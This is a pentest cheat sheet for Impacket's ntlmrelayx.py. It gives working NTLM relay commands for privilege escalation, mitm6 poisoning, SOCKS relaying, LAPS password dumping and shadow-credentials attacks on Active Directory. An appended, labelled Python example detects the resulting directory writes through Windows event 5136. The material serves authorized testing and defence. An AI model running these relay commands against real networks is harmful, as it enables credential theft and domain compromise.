ntlmrelayx.py
ntlmrelayx.py is part of Impacket.
Escalate privileges via relay
If you've already added a computer record to the environment (using something like powermad), you may be able to relay to LDAP and assign escalated privileges to that computer object! For example:
ntlmrelayx.py -t ldap://ip.of.domain.controller --delegate-access -smb2support --escalate-user COMPUTER-OBJECT-YOU-CONTROL$
Then, if you've found a system running WebClient, you could potentially coerce authentication to a DNS record you've added and pull off the privesc!
Delegate access attack while poisoning with mitm6
ntlmrelayx.py -6 -wh doesntexist -t ldaps://ip.of.a.domain-controller --delegate-access
Set up a SOCKS relay to a list of hosts
In this example we have a targets.txt file full of entries like this:
smb://1.2.3.4
smb://1.2.3.5
smb://1.2.3.6
We set up the SOCKS relay like so:
ntlmrelayx.py -tf targets.txt -smb2support -socks
Dumping LAPS passwords
If you only want a relay that dumps the LAPS passwords (if you're lucky enough to relay a DA credential), you can skip dumping the domain info and/or adding a DA account and just specify that you want to dump LAPS passwords:
ntlmrelayx.py -6 -wh doesntexist -t ldap://ip.of.a.domain-controller --no-da --no-dump --dump-laps
Shadow Credentials attack
My favorite write-up on this attack is probably this one from GuidePoint Security.
Find hosts with WebClient running
The webclientservicescanner works well for this.
Add a rogue DNS record pointing to your machine
Try dnstool.py for this.
Set up the relay for the Shadow Credentials attack
ntlmrelayx.py -t ldap://ip.of.a.dc --shadow-credentials --shadow-target 'VICTIM$' --no-validate-privs --no-dump --no-da
Trigger HTTP auth from VICTIMS
Head to our coercer page for more info.
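On the defensive side, both LDAP relay outcomes above leave a directory write behind: --delegate-access adds a value to msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD) and --shadow-credentials adds one to msDS-KeyCredentialLink. The following is an added example, not part of this cheat sheet or of Impacket, that classifies Windows Security event 5136 records for those writes; the event records are constructed and simplified, and the object names (WS01, ATTACKERPC, lab.local) are assumptions.

```python
"""Added example, not from the original cheat sheet: classify Windows Security
event 5136 (directory object modified) records for the two LDAP relay outcomes
above: --delegate-access writes msDS-AllowedToActOnBehalfOfOtherIdentity (RBCD)
and --shadow-credentials writes msDS-KeyCredentialLink. Input is a constructed,
simplified list of dicts keyed by the 5136 field names, not real telemetry."""

WATCHED = {
    "msDS-AllowedToActOnBehalfOfOtherIdentity": "RBCD write (delegate-access relay)",
    "msDS-KeyCredentialLink": "KeyCredentialLink write (shadow credentials relay)",
}

# Constructed sample events; "Value Added" is the 5136 OperationType %%14674.
SAMPLE_EVENTS = [
    {"EventID": 5136, "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink",
     "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "dc-admin",
     "ObjectDN": "CN=ATTACKERPC,CN=Computers,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "msDS-AllowedToActOnBehalfOfOtherIdentity",
     "OperationType": "Value Added"},
    {"EventID": 5136, "SubjectUserName": "svc-deploy",
     "ObjectDN": "CN=FS01,CN=Computers,DC=lab,DC=local",
     "AttributeLDAPDisplayName": "description",
     "OperationType": "Value Added"},
    {"EventID": 4624, "SubjectUserName": "WS01$"},  # not a directory change
]

def _rdn_name(dn):
    """Leading RDN value of a DN, e.g. 'WS01' for 'CN=WS01,CN=Computers,...'."""
    return dn.split(",", 1)[0].split("=", 1)[-1]

def classify_events(events):
    """Return [(severity, subject, object_dn, reason)] for watched attribute writes.

    A principal adding one of these values on its *own* computer object is the
    exact shape the relay produces (the relayed machine account modifies itself),
    so it is rated high; any other write is rated medium for review."""
    findings = []
    for ev in events:
        if ev.get("EventID") != 5136 or ev.get("OperationType") != "Value Added":
            continue
        attr = ev.get("AttributeLDAPDisplayName", "")
        if attr not in WATCHED:
            continue
        subject, target = ev["SubjectUserName"], _rdn_name(ev["ObjectDN"])
        self_write = subject.rstrip("$").lower() == target.lower()
        findings.append(("high" if self_write else "medium", subject,
                         ev["ObjectDN"], WATCHED[attr]))
    return findings
```

Event 5136 only fires when a SACL auditing "Write Property" on the relevant attributes is in place and Directory Service Changes auditing is enabled, so check that prerequisite before relying on this signal.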